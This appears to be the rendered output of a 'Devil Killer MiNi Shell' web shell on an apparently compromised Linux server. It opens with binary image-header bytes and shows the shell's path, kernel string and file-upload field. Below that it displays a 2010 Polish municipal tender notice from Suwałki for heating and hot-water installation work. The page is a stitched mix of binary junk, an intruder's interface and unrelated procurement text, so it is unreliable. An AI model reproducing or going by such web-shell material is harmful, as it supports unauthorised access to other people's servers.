JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100715/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100715/188703-N-2010.html

<p class="kh_header"><b>Suwałki: Zaprojektowanie  i  wykonanie  instalacji  c.o.  i  c.w.  z  mieszkaniowymi  stacjami  wymiennikowymi, licznikami  ciepła  oraz  adaptacją  pomieszczenia  węzła  cieplnego  w  budynku  mieszkalnym  przy   ul.  Noniewicza  41   w  Suwałkach</b><br>
<b>Numer ogłoszenia: 188703 - 2010; data zamieszczenia: 15.07.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zarząd Budynków Mieszkalnych w Suwałkach , ul. Wigierska 32, 16-400 Suwałki, woj. podlaskie, tel. 087 563 50 00, faks 087 563 50 79.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zaprojektowanie  i  wykonanie  instalacji  c.o.  i  c.w.  z  mieszkaniowymi  stacjami  wymiennikowymi, licznikami  ciepła  oraz  adaptacją  pomieszczenia  węzła  cieplnego  w  budynku  mieszkalnym  przy   ul.  Noniewicza  41   w  Suwałkach.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.  Zakres  prac  projektowych  obejmuje :

-	instalację  c.w.  do  istniejących  zlewozmywaków  i  wanien  wraz  z  bateriami  w  lokalach  mieszkalnych ( instalacja wody - rury stalowe ocynkowane i  PE/AL/PE  )  z  indywidualnymi  wymiennikami  dla  każdego  lokalu,
-	indywidualne  wymienniki  ciepłej  wody  i  liczniki  ciepła  montować  w  zamykanych  skrzynkach  w  miejscach  ogólnie  dostępnych,
-	instalację c.o. z  indywidualnymi  licznikami  ciepła ( rury stalowe czarne - leżaki i  piony  oraz  rury PE/Al/PE, grzejniki płytowe ) , zaprojektowanie  w  pomieszczeniach  łazienek i  kuchni  wymaganej  normami  wentylacji,
-	adaptacja  pomieszczenia  węzła  cieplnego  zgodnie  z  warunkami  i  wytycznymi  PEC  w  Suwałkach  Spółka  z  o.o.( doprowadzenie  do  węzła  cieplnego  instalacji  zimnej  wody , podłączenie  instalacji  c.o., wykonanie  wentylacji  nawiewnej  i  wywiewnej, wykonanie  instalacji  elektrycznej  dla  potrzeb  węzła  od  złącza  pomiarowego  zgodnie  z  warunkami  technicznymi ),  
-	instalację  gazową  ( kuchenka, butla,  reduktor, wąż ) w  mieszkaniu  Nr 3, 4 i 7 .
-	rozbiórkę  trzonów  piecowych  i  kuchennych  z  wykonaniem  robót  towarzyszących,     
-	inwentaryzację  dla  potrzeb  opracowywanej dokumentacji  projektowej ,
-	przedmiary  robót  z  określeniem  zakresu  dla  każdej  z  branż  oddzielnie - 2 egz., 
-	specyfikację  techniczną  wykonania  i  odbioru  robót   -  2 egz.,
-	dokumentację  projektową oddzielnie dla  każdej  z  branż  -  5 egz.,
-	charakterystyka  energetyczna  budynku - 5 egz. 
       
2.  Wykonanie  zgodnie  z  opracowaną  dokumentacją  projektową  n/w  robót  :

-	instalacji  c.w., 
-	instalacji  c.o.,
-	w  pomieszczeniach  łazienek  i  kuchni  wymaganej  normami  wentylacji,
-	pomieszczenia   węzła   cieplnego  z  instalacja  elektryczną,   
-	rozebranie  trzonów  piecowych  i  kuchennych  z  wykonaniem  robót  towarzyszącymi, 
-	wykonanie  instalacji  gazowej ( kuchenka,  butla,  reduktor, wąż) w  mieszkaniu 
      Nr 3, 4 i 7. 

3. Wymagania  względem  dokumentacji  projektowej :

Przedmiar  robót  powinien  być  sporządzony  w  zakresie  o  którym  mowa  w  § 6              Rozporządzenia  Ministra  Infrastruktury  z  dnia  02.09.2004 r. w  sprawie  szczegółowego  zakresu  i formy dokumentacji projektowej, specyfikacji technicznych wykonania  i odbioru robót budowlanych oraz  programu funkcjonalno - użytkowego -  Dz.U. z 2004 roku   Nr. 202. poz. 2072  z późniejszymi  zmianami .

 4. Dokumentację  projektową opracować należy  zgodnie  z :

- Rozporządzeniem  Ministra  Infrastruktury  z  dnia  2 września  2004  roku  w  sprawie  szczegółowego  zakresu  i  formy   dokumentacji  projektowej , specyfikacji  technicznych  wykonania  i  odbioru  robót  budowlanych oraz  programu funkcjonalno - użytkowego - Załącznik  Nr 8 do  SIWZ -  Dz. U. z 2004 r.  Nr.  202  poz. 2072  z  późniejszymi  zmianami.  
-  Rozporządzeniem  Ministra  Infrastruktury  z  dnia  3  lipca  2003 roku  w  sprawie  szczegółowego  zakresu  i  formy  projektu  budowlanego  ( Dz.U. Nr 120  poz.  1133  z  późniejszymi  zmianami ) .
-  Rozporządzeniem  Ministra  Infrastruktury  z  dnia  12  kwietnia  2002  roku  w  sprawie  warunków  technicznych, jakim  powinny  odpowiadać  budynki  i  ich  usytuowanie  (Dz.U. Nr 75 poz. 690, z 2003 r., Nr 33 poz. 270, Nr 109 poz. 1166 z 2004 r. oraz Nr 201 poz. 1238  z  2008r.)

-  Obowiązującymi  przepisami  Prawa  budowlanego ( tekst  jednolity  z  2006 r. - Dz. U . Nr  156 poz. 1118  z  późniejszymi  zmianami ).

-  Zgodnie  z  warunkami  technicznymi  PEC  w  Suwałkach  Spółka  z  o.o., oraz  PGE  Dystrybucja   Sp. z  o.o.  Zakład  Sieci  Suwałki .

Do obowiązków  wykonawcy należy pozyskanie wymaganych  uzgodnień określonych  warunkami   Technicznymi  i  przepisami  Prawa  Budowlanego,  uzgodnień  z  Miejskim  Konserwatorem  Zabytków  w  Suwałkach  i  ponoszenie   związanych  z  tym  kosztów .

 5. Przed  złożeniem  oferty  należy  zapoznać  sie  w  terenie z  przedmiotem  zamówienia  .

 6.  Dane  charakteryzujące  przedmiot  zamówienia:

         -  powierzchnia  użytkowa   	     -     279,96 m2
         -  ilość  kondygnacji            	     -          2  szt.
         -  ilość  lokali mieszkalnych  	     -          7  szt.  
         -  ilość  osób korzystających z  lokali  -      22  osoby
         -  poddasze  użytkowe - mieszkalne
         -  budynek  częściowo  podpiwniczony.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.33.00.00-9, 45.33.11.00-7, 45.21.00.00-2, 45.31.12.00-2, 45.33.30.00-0, 71.22.00.00-6, 71.32.31.00-9, 71.32.12.00-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.09.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.  Wykonawca przystępujący do przetargu zobowiązany jest do wniesienia wadium w wysokości:    
     2000,00  zł.  -   słownie złotych : dwa  tysiące 00/100 .

2.  Wadium  należy  wnieść  w  terminie  do  dnia   30.07.2010 roku  do godz. 900 
     W  jednej  z  n/w  form :

     2.1.  pieniądzu, 

     2.2.  poręczeniach  bankowych  lub  poręczeniach  spółdzielczej  kasy  oszczędnościowo  -   
            kredytowej,  z  tym  że  poręczenie  kasy  jest  zawsze   poręczeniem   pieniężnym;
2.3.gwarancjach  bankowych, 
2.4.gwarancjach  ubezpieczeniowych, 

2.5.poręczeniach  udzielanych  przez   podmioty,  o  których  mowa  w  art.  6b  ust. 5  pkt 2     
     ustawy  z  dnia  9 listopada  2000 roku  o  utworzeniu  Polskiej  Agencji   Rozwoju       
     Przedsiębiorczości  (Dz. U  z  2007 roku  Nr 42,  poz. 275  z   późniejszymi  zmianami ) .

Wadium wnoszone w formie pieniężnej należy wpłacić przelewem na rachunek bankowy: Bank PEKAO S.A. Nr rachunku 07 1240 5211 1111 0000 4926 1336 przy czym za termin wniesienia wadium w formie przelewu pieniężnego przyjmuje  się  termin  uznania  na  rachunku  Zamawiającego.

Wadium  wnoszone  w  innej  formie  niż  pieniężnej  należy  złożyć  w  sekretariacie  ZBM  w  Suwałkach  przy  ul.  Wigierskiej  32  pok. 10  w  terminie  jak  w  pkt. 2 .

3. Zamawiający zwraca wadium wszystkim wykonawcom niezwłocznie po wyborze oferty najkorzystniejszej lub unieważnieniu postępowania, z wyjątkiem wykonawcy, którego oferta została wybrana jako najkorzystniejsza, z zastrzeżeniem  art.46 ust. 4a  ustawy Prawo  zamówień  publicznych .
4. Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, zamawiający zwraca wadium niezwłocznie po zawarciu umowy w sprawie zamówienia publicznego oraz wniesienia zabezpieczenia  należytego  wykonania  umowy.
5. Zamawiający zwraca niezwłocznie wadium, na wniosek wykonawcy, który wycofał ofertę przed upływem  terminu  składania  ofert.
6. Zamawiający żąda ponownego wniesienia  wadium przez  wykonawcę, którym  zwrócono wadium na podstawie Art.46 ust.1 ustawy Prawo zamówień  publicznych,  jeżeli  w  wyniku  rozstrzygnięcia odwołania jego oferta została wybrana jako najkorzystniejsza. Wykonawca wnosi wadium  w  terminie  określonym  przez  zamawiającego.
7. Jeżeli wadium wniesiono w pieniądzu zamawiający zwróci je wraz z odsetkami wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane, pomniejszone o koszty prowadzenia rachunku oraz prowizji bankowej za przelew pieniędzy na rachunek bankowy wskazany  przez  wykonawcę. 
8. Wadium wnoszone w formie poręczeń lub gwarancji musi być złożone w oryginale i musi obejmować cały okres związania ofertą, oraz zawierać stwierdzenie, że na pierwsze pisemne żądanie zamawiającego wzywające do zapłaty wadium, zgodnie z warunkami przetargu, następuje  jego  bezwarunkowa  wypłata  bez  jakichkolwiek  zastrzeżeń.
9.   Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca, którego oferta została     wybrana :
9.1.odmówił   podpisania   umowy  w  sprawie  zamówienia  publicznego  na  warunkach   
      określonych  w  ofercie,
9.2.zawarci umowy  w sprawie zamówienia publicznego stało się niemożliwe  z  przyczyn   
      Leżących  po  stronie  wykonawcy.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. Złożą  oświadczenie, że  spełniają  warunki  określone  w  art. 22 ust 1 ustawy Prawo zamówień  publicznych. 
2. Psiadają  uprawnienia  do  pełnienia  samodzielnej  funkcji  technicznej  w  budownictwie - w  specjalności  budowlanej,  instalacji  elektrycznych, wewnętrznej  instalacji  c.o.  i  wod.- kan. 
3. Co  najmniej  jedna osoba  z  uprawnieniami  do pełnienia  samodzielnej funkcji technicznej w  budownictwie  odbyła   minimum  dwuletnią  praktykę   zawodową  na  budowie  przy  zabytkach  nieruchomych  określone  w  § 8  Rozporządzenia Ministra Kultury  z  dnia  9  czerwca  2004 roku w sprawie prowadzenia prac konserwatorskich, restauratorskich, robót budowlanych, badań konserwatorskich i architektonicznych, a także innych działań przy zabytku wpisanym do rejestru zabytków oraz badań archeologicznych i poszukiwań ukrytych lub porzuconych zabytków ruchomych  ( Dz. U. Nr 150 z 2004 roku poz.1579 ).</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonali  co  najmniej  jedną  robotę  budowlaną  odpowiadającą  swoim  rodzajem  robotom  stanowiącym  przedmiot  zamówienia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Złożą  oświadczenie, że  spełniają  warunki  określone  w  art. 22 ust 1 ustawy Prawo zamówień  publicznych.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Złożą  oświadczenie, że  spełniają  warunki  określone  w  art. 22 ust 1 ustawy Prawo zamówień  publicznych.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. Posiadają  ubezpieczenie  OC w zakresie prowadzonej działalności związanej  z  przedmiotem  zamówienia,
2. Posiadają   środki   finansowe   lub   zdolność   kredytową   na   kwotę   nie   niższą   niż 50 000,00 zł.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Oświadczenie  Wykonawcy  o  spełnieniu  warunków  określonych  w  art. 22  ust. 1  ustawy  Prawo  zamówień  publicznych.
2. Pisemne  zobowiązanie  podmiotów  do  oddania  Wykonawcy  do  dyspozycji  niezbędnych  zasobów  na  okres  korzystania  z  nich  przy  wykonywaniu  zamówienia  -  jeżeli  dotyczy .</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zamawiający  zastrzega  możliwość  zmian  postanowień  zawartej  umowy  w następujących  przypadkach :
1.1.   terminu  wykonania  umowy  w  przypadku :
1.1.1. zaistnienia  tzw. siły wyższej,
1.1.2.  wystąpienia  niekorzystnych  warunków  atmosferycznych  uniemożliwiających  wykonanie  robót  o  tyle  dni,  przez  ile  trwały  przyczyny  niezależne  od  wykonawcy . Przedmiotowy  przypadek  wymaga  pisemnego  potwierdzenia  przez  inspektora  nadzoru,
1.1.3.  zakończenia  prac  przez  Wykonawcę  przed  terminem  umownym,
1.1.4.  wykonania  zamówienia  dodatkowego,
1.2.     wynagrodzenia  w  przypadku :
1.2.1. wprowadzenia  zmian  do  rzeczowego  zakresu  robót  objętych  umową,  które  są  korzystne  i  spowodują  oszczędności  na  rzecz  Zamawiającego  t.j.  zmniejszenie  ilości  robót określonych  umową,
1.2.2.  wprowadzenia  urzędowej  zmiany  stawki  podatku  VAT,
1.3.  Zmiana  wynagrodzenia  wynikającego  z  postanowień  zapisu  p.pkt.1.2.1.  nastąpi  na  podstawie  kosztorysu  powykonawczego  sporządzonego  według  faktycznie  wykonanych  i  odebranych  robót  w  oparciu  o  ceny  zgodne  z  kosztorysem  ofertowym.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> bip.um.suwalki.pl<br>
